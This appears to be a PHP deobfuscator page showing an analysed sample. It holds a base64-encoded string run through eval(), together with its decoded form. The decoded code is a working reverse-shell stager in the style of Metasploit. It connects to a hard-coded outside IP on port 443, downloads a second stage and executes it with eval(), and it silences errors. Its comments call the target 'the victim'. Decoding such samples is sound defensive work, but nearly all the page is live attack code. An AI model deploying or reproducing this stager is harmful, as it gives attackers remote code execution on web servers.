Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $source = "DQplcnJvcl9yZXBvcnRpbmcoMCk7DQojIFRoZSBwYXlsb2FkIGhhbmRsZXIgb3ZlcndyaXRlc..

Decoded Output download


error_reporting(0);
# The payload handler overwrites this with the correct LHOST before sending
# it to the victim.
$ip = '78.241.96.126';
$port = 443;
$ipf = AF_INET;

if (FALSE !== strpos($ip, ":")) {
        # ipv6 requires brackets around the address
        $ip = "[". $ip ."]";
        $ipf = AF_INET6;
}

if (($f = 'stream_socket_client') && is_callable($f)) {
        $s = $f("tcp://{$ip}:{$port}");
        $s_type = 'stream';
} elseif (($f = 'fsockopen') && is_callable($f)) {
        $s = $f($ip, $port);
        $s_type = 'stream';
} elseif (($f = 'socket_create') && is_callable($f)) {
        $s = $f($ipf, SOCK_STREAM, SOL_TCP);
        $res = @socket_connect($s, $ip, $port);
        if (!$res) { die(); }
        $s_type = 'socket';
} else {
        die('no socket funcs');
}
if (!$s) { die('no socket'); }

switch ($s_type) {
case 'stream': $len = fread($s, 4); break;
case 'socket': $len = socket_read($s, 4); break;
}
if (!$len) {
        # We failed on the main socket. There's no way to continue, so
        # bail
        die();
}
$a = unpack("Nlen", $len);
$len = $a['len'];

$b = '';
while (strlen($b) < $len) {
        switch ($s_type) {
        case 'stream': $b .= fread($s, $len-strlen($b)); break;
        case 'socket': $b .= socket_read($s, $len-strlen($b)); break;
        }
}

# Set up the socket for the main stage to use.
$GLOBALS['msgsock'] = $s;
$GLOBALS['msgsock_type'] = $s_type;
eval($b);
die();

Did this file decode correctly?

Original Code

<?php $source = "DQplcnJvcl9yZXBvcnRpbmcoMCk7DQojIFRoZSBwYXlsb2FkIGhhbmRsZXIgb3ZlcndyaXRlcyB0aGlzIHdpdGggdGhlIGNvcnJlY3QgTEhPU1QgYmVmb3JlIHNlbmRpbmcNCiMgaXQgdG8gdGhlIHZpY3RpbS4NCiRpcCA9ICc3OC4yNDEuOTYuMTI2JzsNCiRwb3J0ID0gNDQzOw0KJGlwZiA9IEFGX0lORVQ7DQoNCmlmIChGQUxTRSAhPT0gc3RycG9zKCRpcCwgIjoiKSkgew0KICAgICAgICAjIGlwdjYgcmVxdWlyZXMgYnJhY2tldHMgYXJvdW5kIHRoZSBhZGRyZXNzDQogICAgICAgICRpcCA9ICJbIi4gJGlwIC4iXSI7DQogICAgICAgICRpcGYgPSBBRl9JTkVUNjsNCn0NCg0KaWYgKCgkZiA9ICdzdHJlYW1fc29ja2V0X2NsaWVudCcpICYmIGlzX2NhbGxhYmxlKCRmKSkgew0KICAgICAgICAkcyA9ICRmKCJ0Y3A6Ly97JGlwfTp7JHBvcnR9Iik7DQogICAgICAgICRzX3R5cGUgPSAnc3RyZWFtJzsNCn0gZWxzZWlmICgoJGYgPSAnZnNvY2tvcGVuJykgJiYgaXNfY2FsbGFibGUoJGYpKSB7DQogICAgICAgICRzID0gJGYoJGlwLCAkcG9ydCk7DQogICAgICAgICRzX3R5cGUgPSAnc3RyZWFtJzsNCn0gZWxzZWlmICgoJGYgPSAnc29ja2V0X2NyZWF0ZScpICYmIGlzX2NhbGxhYmxlKCRmKSkgew0KICAgICAgICAkcyA9ICRmKCRpcGYsIFNPQ0tfU1RSRUFNLCBTT0xfVENQKTsNCiAgICAgICAgJHJlcyA9IEBzb2NrZXRfY29ubmVjdCgkcywgJGlwLCAkcG9ydCk7DQogICAgICAgIGlmICghJHJlcykgeyBkaWUoKTsgfQ0KICAgICAgICAkc190eXBlID0gJ3NvY2tldCc7DQp9IGVsc2Ugew0KICAgICAgICBkaWUoJ25vIHNvY2tldCBmdW5jcycpOw0KfQ0KaWYgKCEkcykgeyBkaWUoJ25vIHNvY2tldCcpOyB9DQoNCnN3aXRjaCAoJHNfdHlwZSkgew0KY2FzZSAnc3RyZWFtJzogJGxlbiA9IGZyZWFkKCRzLCA0KTsgYnJlYWs7DQpjYXNlICdzb2NrZXQnOiAkbGVuID0gc29ja2V0X3JlYWQoJHMsIDQpOyBicmVhazsNCn0NCmlmICghJGxlbikgew0KICAgICAgICAjIFdlIGZhaWxlZCBvbiB0aGUgbWFpbiBzb2NrZXQuIFRoZXJlJ3Mgbm8gd2F5IHRvIGNvbnRpbnVlLCBzbw0KICAgICAgICAjIGJhaWwNCiAgICAgICAgZGllKCk7DQp9DQokYSA9IHVucGFjaygiTmxlbiIsICRsZW4pOw0KJGxlbiA9ICRhWydsZW4nXTsNCg0KJGIgPSAnJzsNCndoaWxlIChzdHJsZW4oJGIpIDwgJGxlbikgew0KICAgICAgICBzd2l0Y2ggKCRzX3R5cGUpIHsNCiAgICAgICAgY2FzZSAnc3RyZWFtJzogJGIgLj0gZnJlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOw0KICAgICAgICBjYXNlICdzb2NrZXQnOiAkYiAuPSBzb2NrZXRfcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7DQogICAgICAgIH0NCn0NCg0KIyBTZXQgdXAgdGhlIHNvY2tldCBmb3IgdGhlIG1haW4gc3RhZ2UgdG8gdXNlLg0KJEdMT0JBTFNbJ21zZ3NvY2snXSA9ICRzOw0KJEdMT0JBTFNbJ21zZ3NvY2tfdHlwZSddID0gJHNfdHlwZTsNCmV2YWwoJGIpOw0KZGllKCk7";
$code = base64_decode($source);
eval($code);

Function Calls

base64_decode 1

Variables

$code error_reporting(0); # The payload handler overwrites this..
$source DQplcnJvcl9yZXBvcnRpbmcoMCk7DQojIFRoZSBwYXlsb2FkIGhhbmRsZXIg..

Stats

MD5 2d5a4955751590d4cc39fc3fabbf263d
Eval Count 1
Decode Time 82 ms